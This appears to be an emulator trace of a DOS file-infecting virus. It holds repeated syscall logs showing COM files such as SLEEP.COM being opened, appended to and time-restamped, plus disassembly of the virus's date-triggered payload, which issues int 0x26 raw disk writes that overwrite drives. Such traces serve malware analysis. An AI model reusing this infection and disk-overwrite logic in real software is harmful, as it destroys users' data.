2018-12-25T12:43:37.280154257Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.282113627Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.285450538Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.307695493Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.321860331Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.323814794Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.328667491Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.344679311Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.352431611Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.36044077Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.362702102Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.373764237Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.382208602Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.385665405Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.387607924Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.391149821Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.406147658Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.408455355Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.417868651Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.429948892Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.43335222Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.441055448Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.464420547Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.466877641Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.477723072Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.483656952Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.486095302Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.487418683Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.490510949Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.498091296Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.499297139Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.510709113Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.517816079Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.519936317Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.528257125Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.533749672Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.537060414Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.540666112Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:37.547597306Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:37.549943139Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:37.551981796Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:36.845427579Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:36.847045885Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:36.850560805Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:36.857072833Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:36.863541801Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:36.87337976Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:36.880802856Z 62 PC: 12b20 | Close file
2018-12-25T12:43:36.885657158Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:36.907636934Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.915016047Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:36.922443378Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:36.924974117Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:36.928018729Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:36.938002109Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:36.941122872Z 62 PC: 12c29 | Close file
2018-12-25T12:43:36.949787291Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:36.958960741Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:36.961048817Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.965870099Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:36.970989145Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:36.973510734Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:36.985847284Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:36.99316352Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:36.996199982Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:36.999349076Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.002505513Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.011544114Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.013889613Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.026269758Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.037587749Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.042121974Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.057572127Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.064607625Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.067403217Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.078698914Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.086571852Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.089817599Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.091653003Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.103648466Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.120680271Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.123981237Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.133011002Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.144751644Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.147570508Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.155030321Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.162669821Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.166106214Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.177985502Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.185746101Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.189684762Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.192670323Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.196006778Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.207987925Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.211027559Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.220201888Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.232337274Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.236609449Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.245269468Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.252632811Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.255983111Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.2617658Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.267484887Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.271837335Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.274097752Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.27745962Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.295033576Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.297808379Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.300179579Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.305393606Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.31085279Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.318606989Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.326219221Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.329156803Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.342041692Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.349902169Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.354512984Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.356753468Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.360023143Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.370361558Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.37289358Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.378934919Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.386859623Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.389312243Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.393654569Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.398202651Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.4003661Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.408898009Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.416761788Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.421466042Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.423481423Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.426844973Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.437585976Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.440136923Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.449614571Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.461408789Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.464714238Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.47237584Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.480687451Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.483518956Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.486577646Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:37.491575099Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:37.495238899Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:37.497544719Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:37.003365892Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:37.005082433Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:37.00938501Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:37.017049989Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:37.030217914Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:37.038656241Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:37.047397637Z 62 PC: 12b20 | Close file
2018-12-25T12:43:37.049994702Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:37.067795592Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.076212599Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:37.07977409Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:37.08176995Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:37.08615952Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:37.0970905Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:37.098896598Z 62 PC: 12c29 | Close file
2018-12-25T12:43:37.108895895Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.121848574Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.125201619Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.133061104Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.140459488Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.142122666Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.150907589Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.165214276Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.173247451Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.177818449Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.181526125Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.191258534Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.194680452Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.20806808Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.235050491Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.241630432Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.252756718Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.257536037Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.25906477Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.266579206Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.271279627Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.273629595Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.275835555Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.277993908Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.285853179Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.289046465Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.298673232Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.311480893Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.31550159Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.323456587Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.330249293Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.332480561Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.343497088Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.350760227Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.355215734Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.35813984Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.360175952Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.368864854Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.372418238Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.382437073Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.416698395Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.421024715Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.429863643Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.437362006Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.440124448Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.446386436Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.452030865Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.455446684Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.458424308Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.461766449Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.478504261Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.481629374Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.483996316Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.489707513Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.493982795Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.502171626Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.509531843Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.512746819Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.524349315Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.532105539Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.534958715Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.53756485Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.54572123Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.557255727Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.560099896Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.569074185Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.580452985Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.584789852Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.592174246Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.599543776Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.602987664Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.614621493Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.628302506Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.636775553Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.638596214Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.641846829Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.651524806Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.653508169Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.662038078Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.673175717Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.676442405Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.684574269Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.691923098Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.695120545Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.69809801Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:37.702693842Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:37.705957886Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:37.707999632Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:37.046520896Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:37.048534239Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:37.053182225Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:37.060179759Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:37.067110585Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:37.07604369Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:37.083520776Z 62 PC: 12b20 | Close file
2018-12-25T12:43:37.086073886Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:37.108132011Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.120587819Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:37.128187266Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:37.130642Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:37.134214668Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:37.143382705Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:37.145624029Z 62 PC: 12c29 | Close file
2018-12-25T12:43:37.156493562Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.168546488Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.172028085Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.181229379Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.188970345Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.191404465Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.200263902Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.205462445Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.207802604Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.210204973Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.212221279Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.217915177Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.219264625Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.226004604Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.241124804Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.244283473Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.252144512Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.25941585Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.261924119Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.274438056Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.282102208Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.285527744Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.287955656Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.291402689Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.302906276Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.305709611Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.314954897Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.327983426Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.332992264Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.34175553Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.349925887Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.352552459Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.36617589Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.374953412Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.378598037Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.381429245Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.384730098Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.394804258Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.39768807Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.40622268Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.417205532Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.421483885Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.430453838Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.437906983Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.441196435Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.44687509Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.45244382Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.456051445Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.458889835Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.462127005Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.481563035Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.48447813Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.486886146Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.492114299Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.497343617Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.504934599Z 63 PC: 12b1c | Read file or device (See above)
